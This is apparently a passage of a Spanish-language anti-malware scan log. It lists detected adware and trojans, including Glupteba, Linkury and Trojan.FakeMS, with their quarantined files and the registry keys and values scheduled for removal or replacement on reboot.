Adware.Tuto4PC.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\IS-LRH00.TMP\MOULIALEFIL.EXE, En cuarentena, 3712, 667274, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE, En cuarentena, 1138, 781246, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X86\SQLite.Interop.dll, En cuarentena, 424, 431817, , , , 
RiskWare.Packed.Themida, C:\PROGRAMDATA\ERRORRESPONDER\ERRORRESPONDER.EXE, En cuarentena, 7487, 804571, , , , 
Generic.Malware/Suspicious, C:\WINDOWS\[email protected], En cuarentena, 0, 392686, , , , 

Clave del registro: 96
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CloudPrinter, Se eliminará al reiniciar, 922, 259506, , , , 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}, Se eliminará al reiniciar, 922, 259987, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch, Se eliminará al reiniciar, 266, 259314, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\TESTAPP, Se eliminará al reiniciar, 494, 781336, 1.0.21478, , ame, 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\System\SYSTEMCHECK, Se eliminará al reiniciar, 3119, 414093, , , , 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C0DBCC98-BB2A-447E-8147-5E4759E9D96D}, Se eliminará al reiniciar, 3119, 414093, , , , 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{C0DBCC98-BB2A-447E-8147-5E4759E9D96D}, Se eliminará al reiniciar, 3119, 414093, , , , 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASAPI32, Se eliminará al reiniciar, 922, 259705, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\CloudPrinter_RASMANCS, Se eliminará al reiniciar, 922, 259705, 1.0.21478, , ame, 
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Snorler_RASAPI32, Se eliminará al reiniciar, 904, 655949, 1.0.21478, , ame, 
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinDefender, Se eliminará al reiniciar, 491, 455564, , , , 
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\Snorler_RASMANCS, Se eliminará al reiniciar, 904, 655949, 1.0.21478, , ame, 
Adware.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Snorler.exe, Se eliminará al reiniciar, 904, 655948, 1.0.21478, , ame, 
Adware.Linkury, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\BACKLH, Se eliminará al reiniciar, 424, 379533, 1.0.21478, , ame, 
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\csrss, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{968BD611-9D62-4C37-B71A-BA21308BDE53}, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{968BD611-9D62-4C37-B71A-BA21308BDE53}, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\TYPELIB\{5AB313A9-E0D8-434B-B1CE-9BD0A1DCEA73}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\INTERFACE\{F381C879-A5C7-4978-B6EC-D41127E6DC87}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{F381C879-A5C7-4978-B6EC-D41127E6DC87}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{F381C879-A5C7-4978-B6EC-D41127E6DC87}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{5AB313A9-E0D8-434B-B1CE-9BD0A1DCEA73}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{5AB313A9-E0D8-434B-B1CE-9BD0A1DCEA73}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\TYPELIB\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0f872661-c863-47a4-863f-c065c182858a}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{9D613F8A-B30E-4938-8490-CB5677701EBF}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\TYPELIB\{A195846E-1536-4ACD-A720-9DB32D3AD239}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{5E376961-9097-481C-886C-59A7A3DE24F0}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{6766BB3A-7821-46B3-98BF-41F0402B73D1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{72C88F85-FE66-4E49-BA23-8E850D607D06}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{76EECC6C-1042-4272-9468-9DF02AFB0A2D}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\TYPELIB\{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0776ae27-5ab9-4e18-9063-1836da63117a}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{0E24F81B-3B09-4455-95CE-0B8C719EA2DC}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{10C9242E-D604-49B5-99E4-BF87945EF86C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{1196AE48-D92B-4BC7-85DE-664EC3F761F1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{22A68885-0FD9-42F6-9DED-4FB174DC7344}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{2EB31403-EBE0-41EA-AE91-A1953104EA55}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{48F49A60-AFA8-469D-98EA-64075FA6A1D6}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{53de12aa-df96-413d-a25e-c75b6528abf2}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{AF60000F-661D-472A-9588-F062F6DB7A0E}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{C0995E25-0B96-40FE-A31A-96EA3EEE1600}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{c1439245-96b4-47fc-b391-679386c5d40f}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{F062BA81-ADFE-4A92-886A-23FD851D6406}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AB8537C-159B-455D-9813-C7CB0BC69A90}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{2AB8537C-159B-455D-9813-C7CB0BC69A90}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{025EAD11-7928-4F28-8569-C009EE9DCFED}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{48185BB3-FC80-4AC8-82B8-38BFFAE0455F}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{48185BB3-FC80-4AC8-82B8-38BFFAE0455F}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{111E94BF-2FBE-4662-8EE2-E722532AD46A}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{E9E54652-C473-4C56-83B9-E608F8FB8CA7}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{E9E54652-C473-4C56-83B9-E608F8FB8CA7}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4019DA72-1B00-4FAD-8052-F0518E2C1509}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{4019DA72-1B00-4FAD-8052-F0518E2C1509}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{76188DFE-44A0-4E86-B159-FCBB9C714646}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5C5F48DD-AAC1-4A2B-826F-9791035D4DC1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{5C5F48DD-AAC1-4A2B-826F-9791035D4DC1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0914E1B1-22EB-4FEB-8194-425AA2933CBD}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{0914E1B1-22EB-4FEB-8194-425AA2933CBD}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\Winmon, Se eliminará al reiniciar, 494, 781215, , , , 
Trojan.Glupteba.E, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\EpicNet Inc., Se eliminará al reiniciar, 494, 781249, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A19BCAF8-246C-4F2A-AC23-4A816DEDFE85}, Se eliminará al reiniciar, 1171, 784089, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinmonFS, Se eliminará al reiniciar, 494, 781211, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinmonProcessMonitor, Se eliminará al reiniciar, 494, 781210, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{A19BCAF8-246C-4F2A-AC23-4A816DEDFE85}, Se eliminará al reiniciar, 1171, 784090, , , , 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\MICROSOFT\WINDOWS\TIME SYNCHRONIZATION\ViewUtcTime, Se eliminará al reiniciar, 1171, 784090, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting, Se eliminará al reiniciar, 922, 259928, 1.0.21478, , ame, 
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, Se eliminará al reiniciar, 0, 392686, , , , 
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppSvc.exe, Se eliminará al reiniciar, 0, 392686, , , , 
Generic.Malware/Suspicious, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, Se eliminará al reiniciar, 0, 392686, , , , 
Generic.Malware/Suspicious, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppSvc.exe, Se eliminará al reiniciar, 0, 392686, , , , 

Valor del registro: 26
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Se eliminará al reiniciar, 922, -1, 0.0.0, , action, 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Se eliminará al reiniciar, 922, -1, 0.0.0, , action, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\ENVIRONMENT|SNF, Se eliminará al reiniciar, 922, -1, 0.0.0, , action, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, Se eliminará al reiniciar, 922, 259987, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DISPLAYNAME, Se eliminará al reiniciar, 266, 259314, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Se eliminará al reiniciar, 922, 259988, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\TESTAPP|DEFENDER, Se eliminará al reiniciar, 494, 781336, 1.0.21478, , ame, 
Adware.Linkury, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\BACKLH|IMAGEPATH, Se eliminará al reiniciar, 424, 379533, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DISPLAYNAME, Se eliminará al reiniciar, 266, 259313, 1.0.21478, , ame, 
Trojan.Agent, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|FLORALSHAPE, Se eliminará al reiniciar, 491, 196479, 1.0.21478, , ame, 
Adware.Tuto4PC.Generic, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|2301610, Se eliminará al reiniciar, 3712, 667274, 1.0.21478, , ame, 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Chromium, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CLOUDNET, Se eliminará al reiniciar, 1138, 781246, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, Se eliminará al reiniciar, 922, 259989, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{968BD611-9D62-4C37-B71A-BA21308BDE53}|PATH, Se eliminará al reiniciar, 494, 781231, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A19BCAF8-246C-4F2A-AC23-4A816DEDFE85}|PATH, Se eliminará al reiniciar, 1171, 784089, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-21-1649130365-987012723-906343211-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYOVERRIDE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C0DBCC98-BB2A-447E-8147-5E4759E9D96D}|PATH, Se eliminará al reiniciar, 3119, 461394, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CLOUDPRINTER|IMAGEPATH, Se eliminará al reiniciar, 922, 259916, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\ENVIRONMENT|SNF, Se eliminará al reiniciar, 922, 259517, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\ENVIRONMENT|SNP, Se eliminará al reiniciar, 922, 259518, 1.0.21478, , ame, 
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WINDEFENDER|IMAGEPATH, Se eliminará al reiniciar, 491, 428246, 1.0.21478, , ame, 

Datos del registro: 8
PUP.Optional.Linkury, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Se reemplazará al reiniciar, 266, 293476, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH PAGE, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH BAR, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
